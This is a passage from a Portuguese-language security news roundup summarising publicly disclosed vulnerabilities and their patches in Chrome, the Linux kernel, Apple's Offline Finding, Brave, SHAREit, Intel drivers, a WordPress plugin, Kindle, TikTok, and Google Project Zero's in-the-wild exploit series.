programado para o dia 22 de março. “O Zoom leva todos os relatórios de vulnerabilidades de segurança a sério. Estamos cientes desse problema e estamos trabalhando para resolvê-lo”, disse um porta-voz da empresa ao ThreatPost.
  16. O Google detectou uma vulnerabilidade 0-day sob ataque ativo no navegador Chrome. Se explorada, a falha pode permitir a execução remota de código e ataques de negação de serviço nos sistemas afetados, segundo o ThreatPost. A vulnerabilidade existe no motor de navegador para Chrome desenvolvido como parte do projeto Chromium, o Blink. Os mecanismos do navegador convertem documentos HTML e outros recursos de página da Internet em representações visuais que podem ser visualizadas pelos usuários finais. Segundo o ThreatPost, a falha CVE-2021-21193 é classificada como de alta gravidade e pode permitir que um invasor remoto execute um código arbitrário no sistema. O Google não forneceu mais detalhes sobre os exploits. O Google publicou uma atualização de segurança para Windows, Mac e Linux. Além da 0-day, o Google lançou outras quatro correções de segurança.
  17. Três vulnerabilidades foram encontradas no subsistema iSCSI do kernel do Linux, permitindo que invasores locais com privilégios básicos de usuário obtenham privilégios de root em sistemas Linux sem patch. Segundo o BleepingComputer, os bugs de segurança só podem ser explorados localmente, o que significa que invasores em potencial terão que obter acesso a dispositivos vulneráveis explorando outra vulnerabilidade ou usando um vetor de ataque alternativo. O mais impressionante é que essas vulnerabilidades já existem há 15 anos. A descoberta foi feita por pesquisadores do GRIMM. "Ao contrário da maioria das coisas que encontramos acumulando poeira, esses bugs revelaram-se ainda bons, e um acabou sendo utilizável como um escalonamento de privilégio local (LPE) em vários ambientes Linux", diz publicação feita no blog do GRIMM. De acordo com o pesquisador de segurança do GRIMM, Adam Nichols, as falhas afetam todas as distribuições Linux, mas felizmente o módulo de kernel scsi_transport_iscsi vulnerável não é carregado por padrão. No entanto, dependendo da distribuição do Linux que os atacantes estejam focando, o módulo pode ser carregado e explorado para escalonamento de privilégios. Saiba mais sobre as vulnerabilidades: CVE-2021-27363: vazamento do ponteiro do kernel (vazamento de informações) CVE-2021-27364: leitura fora dos limites (vazamento de informações, negação de serviço) CVE-2021-27365: estouro de buffer de heap (escalonamento de privilégio local, vazamento de informações, negação de serviço)
  18. Pesquisadores da Universidade Técnica de Darmstadt, na Alemanha, publicaram artigo sobre duas vulnerabilidades encontradas em um sistema de rastreamento de localização que ajuda os usuários a localizarem dispositivos Apple mesmo quando eles estão offline. A análise dos pesquisadores avalia a segurança e a privacidade do Offline Finding (OF), um sistema de rastreamento de localização por crowdsourcing para dispositivos offline lançado pela Apple em 2019. A ideia básica por trás do OF é que os chamados dispositivos localizadores possam detectar a presença de outros dispositivos offline perdidos usando o Bluetooth Low Energy (BLE) e sua conexão de Internet para relatar uma localização aproximada de volta ao proprietário. Os pesquisadores afirmam, contudo, que duas vulnerabilidades distintas de design e implementação podem ter consequências graves para os usuários. Eles explicam que o design OF permite que a Apple correlacione diferentes localizações de proprietários se suas localizações forem relatadas pelo mesmo localizador. Assim, ao fazer upload e download de relatórios de localização, dispositivos localizadores e proprietários revelam sua identidade para a Apple. Além disso, os aplicativos macOS maliciosos podem recuperar e descriptografar os relatórios de localização OF dos últimos sete dias para todos os seus usuários e dispositivos. As descobertas foram compartilhadas com a Apple por meio de divulgação responsável, que corrigiu o problema por meio de uma atualização do sistema operacional (CVE-2020-9986).
  19. O Brave Browser está corrigindo uma falha de privacidade que permite o vazamento de endereços de URL do Tor para o seu servidor DNS configurado localmente. Isso pode expor os sites que são visitados em anonimato. O BleepingComputer explica que o Brave foi modificado para dar mais privacidade, incluindo um modo de navegador Tor embutido para que o usuário possa acessar sites anonimamente. Os sites localizados no Tor usam endereços URL que os usuários só podem acessar através da rede Tor. Para acessar os URLs do Tor, o Brave adicionou um modo 'Janela privada com Tor' que atua como um proxy para a rede, mas aparentemente o modo Tor do Brave não fornece o mesmo nível de privacidade que é oferecido pelo navegador Tor. Ao usar o modo Tor do Brave, ele deve encaminhar todas as solicitações aos proxies do Tor e não enviar nenhuma informação a nenhum dispositivo de Internet para aumentar a privacidade. No entanto, um bug está fazendo com que o URL de qualquer endereço Tor visitado seja enviado como uma consulta DNS padrão para o servidor configurado na máquina do usuário. O Brave comentou sobre a falha em sua página no GitHub, e os desenvolvedores já criaram uma correção.
  20. Pesquisadores da Trend Micro descobriram que o aplicativo SHAREit para Android está repleto de falhas que podem permitir o vazamento de dados confidenciais de um usuário e executar código arbitrário usando um código ou aplicativo malicioso. As vulnerabilidades também podem levar à execução remota de código (RCE). Segundo a Trend Micro, o SHAREit foi baixado mais de 1 bilhão de vezes, sendo um aplicativo que permite aos usuários Android compartilharem arquivos entre amigos ou dispositivos. As falhas foram identificadas e relatadas ao fabricante do app há três meses, diz a empresa de segurança, mas continuam sem correção, de acordo com relatório publicado na segunda-feira, que explica também como as falhas podem ser exploradas. "Relatamos essas vulnerabilidades ao fornecedor, que ainda não respondeu. Decidimos divulgar nossa pesquisa 3 meses após o relato, já que muitos usuários podem ser afetados por este ataque, pois o invasor pode roubar dados confidenciais e fazer qualquer coisa com a permissão dos aplicativos. Também não é facilmente detectável", diz o relatório.
  21. A Intel corrigiu 57 vulnerabilidades de segurança, incluindo as de alta gravidade que afetavam Drivers de Gráficos. Segundo o BleepingComputer, 40 delas foram encontradas internamente pela empresa, enquanto outras 17 foram relatadas externamente, quase todas por meio do programa de bug bounty da Intel. Os bugs de segurança são detalhados em avisos de segurança publicados pela Intel com atualizações de segurança e funcionais entregues aos usuários por meio do processo Intel Platform Update (IPU). A Intel inclui uma lista de todos os produtos afetados e recomendações para produtos vulneráveis no final de cada comunicado. A empresa fornece detalhes de contato para usuários e pesquisadores que desejam relatar outros problemas de segurança ou vulnerabilidades encontradas em produtos ou tecnologias da marca Intel.
  22. A equipe de desenvolvimento do NextGEN Gallery corrigiu duas vulnerabilidades graves para proteger os sites de possíveis ataques de controle. O plugin do WordPress é usado para criar galerias de imagens e, segundo o BleepingComputer, tem atualmente mais de 800 mil instalações ativas. As falhas encontradas no plugin são de cross-site request forgery (CSRF), que permite que comandos não autorizados sejam transmitidos a partir de um usuário em quem a aplicação confia. Assim, a atualização de segurança deve ser uma prioridade para todos os proprietários de sites que têm o NextGEN Gallery instalado. As duas vulnerabilidades de segurança são classificadas como de severidade alta e crítica pela equipe de Threat Intelligence do Wordfence que as descobriu, segundo o BleepingComputer. Atacantes podem explorar essas falhas enganando os administradores do WordPress para que eles cliquem em links ou anexos especialmente criados para executar códigos maliciosos em seus navegadores. Após a exploração bem-sucedida, as vulnerabilidades podem permitir que os invasores configurem um redirecionamento malicioso, injetem spam, abusem de sites comprometidos para phishing e, em última análise, assumam completamente o controle dos sites. O editor do plugin, Imagely, enviou patches para revisão em 16 de dezembro e publicou a versão 3.5.0, corrigida, em 17 de dezembro de 2020. Ainda assim, a nova versão tinha esta semana pouco mais de 266 mil novos downloads, conforme informa o BleepingComputer, o que significa que mais de 530 mil sites WordPress com instalações do NextGEN Gallery ativas estão potencialmente expostas a ataques de controle se os invasores começarem a explorar os bugs. 😬
  23. Uma série de vulnerabilidades no Kindle da Amazon poderia ter permitido que atacantes assumissem o controle dos dispositivos das vítimas. Segundo a Vice, um pesquisador da empresa de segurança Realmode Labs analisou no ano passado a segurança de Kindles, em particular o recurso Send to Kindle da Amazon, que permite que usuários enviem e-books ou artigos para o dispositivo. O pesquisador descobriu três vulnerabilidades diferentes que, se combinadas, poderiam levar um criminoso a assumir o controle do Kindle de uma vítima e gastar dinheiro com seu cartão de crédito na Kindle Store, bem como acessar qualquer informação pessoal armazenada no dispositivo, como nome completo e endereço. O ataque poderia começar por meio de um e-book malicioso enviado a uma vítima. Um fator atenuante é que o criminoso precisaria falsificar o endereço de e-mail usado para corresponder ao endereço de e-mail @ kindle.com usado pelo alvo. Após enviar o e-book para a vítima, ele apareceria automaticamente na biblioteca do Kindle, e ao abri-lo, ao clicar em um link no índice, o Kindle abriria uma página HTML no navegador que conteria um arquivo de imagem malicioso. Isso daria permissão ao hacker para assumir o controle do dispositivo. Um porta-voz da Amazon confirmou à Vice que os bugs foram corrigidos e foi lançada uma atualização automática de software pela Internet que corrige o problema para todos os modelos do Amazon Kindle lançados depois de 2014. Outros modelos de Kindle afetados também receberão essa correção.
  24. A Check Point Research descobriu uma vulnerabilidade no recurso localizador de amigos do TikTok que, se explorada, teria permitido que um invasor acessasse os detalhes do perfil dos usuários, incluindo os números de telefone associados às suas contas. Assim, um criminoso poderia construir um banco de dados de usuários e seus números de telefone relacionados, utilizando-o para atividades mal-intencionadas. "Uma solução já foi implantada de forma responsável pelo TikTok para garantir que seus usuários possam continuar usando o aplicativo com segurança", diz a Check Point em comunicado. A Check Point conta que o aplicativo permite a sincronização de contatos, o que significa que um usuário pode sincronizar seus contatos de telefone para encontrar facilmente pessoas que possam conhecer no TikTok. Isso torna possível conectar os detalhes do perfil dos usuários aos seus números de telefone e, se explorada, a vulnerabilidade teria afetado apenas os usuários que optaram por associar um número de telefone à sua conta – o que não é obrigatório – ou conectado a um número de telefone. Segundo a empresa de segurança, em abril de 2020, o TikTok lançou um programa privado de recompensa para caçadores de bugs que se tornou uma parceria pública global com a HackerOne em outubro de 2020. Assim, pesquisadores de segurança foram incentivados a encontrar e divulgar as falhas de segurança de forma responsável para que as equipes do TikTok possam resolvê-los antes que os invasores as explorem, reforçando a segurança do app.
  25. O Project Zero do Google divulgou nesta terça-feira, 12 de janeiro, a série In-the-Wild com 6 publicações detalhando um conjunto de vulnerabilidades encontradas e exploradas. A série de publicações se refere a um ataque de watering hole, ocorrido no primeiro trimestre de 2020, e realizado por um ator altamente sofisticado. O projeto descobrou dois servidores de exploração que fornecem cadeias de exploração diferentes por meio de ataques watering hole, sendo um servidor direcionado aos usuários do Windows e outro direcionado ao Android. Os servidores Windows e Android usaram exploits do Chrome para a execução remota de código inicial, incluindo 0-days para Chrome e Windows. Para Android, as cadeias de exploit usaram exploits n-day conhecidas publicamente. As quatro vulnerabilidade 0-day descobertas foram corrigidas pelos fornecedores. São elas: CVE-2020-6418 - Vulnerabilidade do Chrome no TurboFan (corrigido em fevereiro de 2020) CVE-2020-0938 - Vulnerabilidade de fonte no Windows (corrigido em abril de 2020) CVE-2020-1020 - Vulnerabilidade de fonte no Windows (corrigido em abril de 2020) CVE-2020-1027 - Vulnerabilidade Windows CSRSS (corrigido em abril de 2020) O Google explica que o Project Zero tem a meta de “tornar o (encontro de) 0-days difícil” usando, principalmente, a pesquisa de segurança ofensiva. "Um dos nossos esforços nesse sentido é o rastreamento de casos publicamente conhecidos de vulnerabilidades 0-day. Usamos essas informações para orientar a pesquisa", explica. Essa iniciativa é feita em parceria com o Google Threat Analysis Group (TAG). As postagens da série In-the-Wild compartilham os detalhes técnicos de diferentes partes da cadeia de exploit, focadas no que a equipe do Project Zero achou mais interessante. São elas: Chrome: Infinity Bug Chrome Exploits Android Exploits Android Post-Exploitation Windows Exploits Nos textos (em inglês) você encontra uma análise detalhada das vulnerabilidades sendo exploradas e cada uma das diferentes técnicas de exploração; uma análise profunda da classe de bug de uma das explorações do Chrome; e uma análise detalhada do código de pós-exploração do Android.
×
×
  • Create New...